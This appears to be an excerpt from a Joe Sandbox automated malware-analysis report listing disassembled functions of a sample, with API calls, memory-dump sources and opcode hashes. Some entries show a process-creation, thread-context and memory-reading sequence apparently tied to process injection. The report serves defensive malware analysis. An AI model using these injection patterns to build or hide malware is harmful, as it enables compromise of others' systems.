                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2714421763-0
                                                                                                                                                                            • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                                                                            • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                                                                                                                            • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                                                                            • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                                                                                                              • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                                                                                                              • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                                                                                                                            • _strcat.LIBCMT ref: 0040F603
                                                                                                                                                                              • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                                                                                                                              • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                                                                                                                            • String ID: HH
                                                                                                                                                                            • API String ID: 1194219731-2761332787
                                                                                                                                                                            • Opcode ID: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                                                                                                                            • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                                                                                                                            • Opcode Fuzzy Hash: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                                                                                                                            • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 04001AA3
                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04001B39
                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04001B5B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2055232953.0000000004000000.00000040.00000020.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4000000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2438371351-0
                                                                                                                                                                            • Opcode ID: a12f6141c25ccc493e08991cf539c14f0b38d60a17e9c5461fba853743308219
                                                                                                                                                                            • Instruction ID: 7bd45c8e290756e72163b3e7cf6c60777226854367248e40f122d02e52aed24b
                                                                                                                                                                            • Opcode Fuzzy Hash: a12f6141c25ccc493e08991cf539c14f0b38d60a17e9c5461fba853743308219
                                                                                                                                                                            • Instruction Fuzzy Hash: AE62EC30A14658DBEB24CFA4C850BDEB376EF58704F1091A9D10DEB2D0E776AE81CB59
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 0040E202
                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: IconNotifyShell__memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 928536360-0
                                                                                                                                                                            • Opcode ID: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
                                                                                                                                                                            • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                                                                                                                            • Opcode Fuzzy Hash: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
                                                                                                                                                                            • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                                                                                                                            APIs
                                                                                                                                                                            • _malloc.LIBCMT ref: 00411734
                                                                                                                                                                              • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                                                                              • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                                                                              • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                              • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1411284514-0
                                                                                                                                                                            • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                                                                            • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                                                                                                                            • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                                                                            • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                                                                            • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                                                                                                            • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                                                                            • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                                                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                                                            • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                                                                            • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                                                                                                                            • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                                                                            • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                                                                                                                            APIs
                                                                                                                                                                            • _malloc.LIBCMT ref: 00435278
                                                                                                                                                                              • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                                                                              • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                                                                              • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                                                                            • _malloc.LIBCMT ref: 00435288
                                                                                                                                                                            • _malloc.LIBCMT ref: 00435298
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _malloc$AllocateHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 680241177-0
                                                                                                                                                                            • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                                                                            • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                                                                                                                            • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                                                                            • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                                                                                                                            APIs
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                            • String ID: @EXITCODE
                                                                                                                                                                            • API String ID: 580348202-3436989551
                                                                                                                                                                            • Opcode ID: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                                                                                                                                                            • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                                                                                                                            • Opcode Fuzzy Hash: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                                                                                                                                                            • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                            • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                                                                            • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                                                                                                            • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                                                                            • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __lock_file_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 26237723-0
                                                                                                                                                                            • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                                                                            • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                                                                                                                            • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                                                                            • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                            • __lock_file.LIBCMT ref: 00414EE4
                                                                                                                                                                              • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                                                                                                                            • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 717694121-0
                                                                                                                                                                            • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                                                                            • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                                                                                                                            • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                                                                            • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 04001AA3
                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04001B39
                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04001B5B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2055232953.0000000004000000.00000040.00000020.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4000000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2438371351-0
                                                                                                                                                                            • Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                                                                                                                            • Instruction ID: 699e97268e4285e1ce39d2f1630883b3ca996eb3ca9320a6131cb03cad951459
                                                                                                                                                                            • Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                                                                                                                            • Instruction Fuzzy Hash: 7F12EE20E24658C6EB24DF60D8507DEB272EF68300F1090E9910DEB7E4E77A5F81CB5A
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                            • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                            • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                                                                                                                            • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                                                                                                                            • Opcode Fuzzy Hash: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                                                                                                                            • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                                                                                                                            APIs
                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
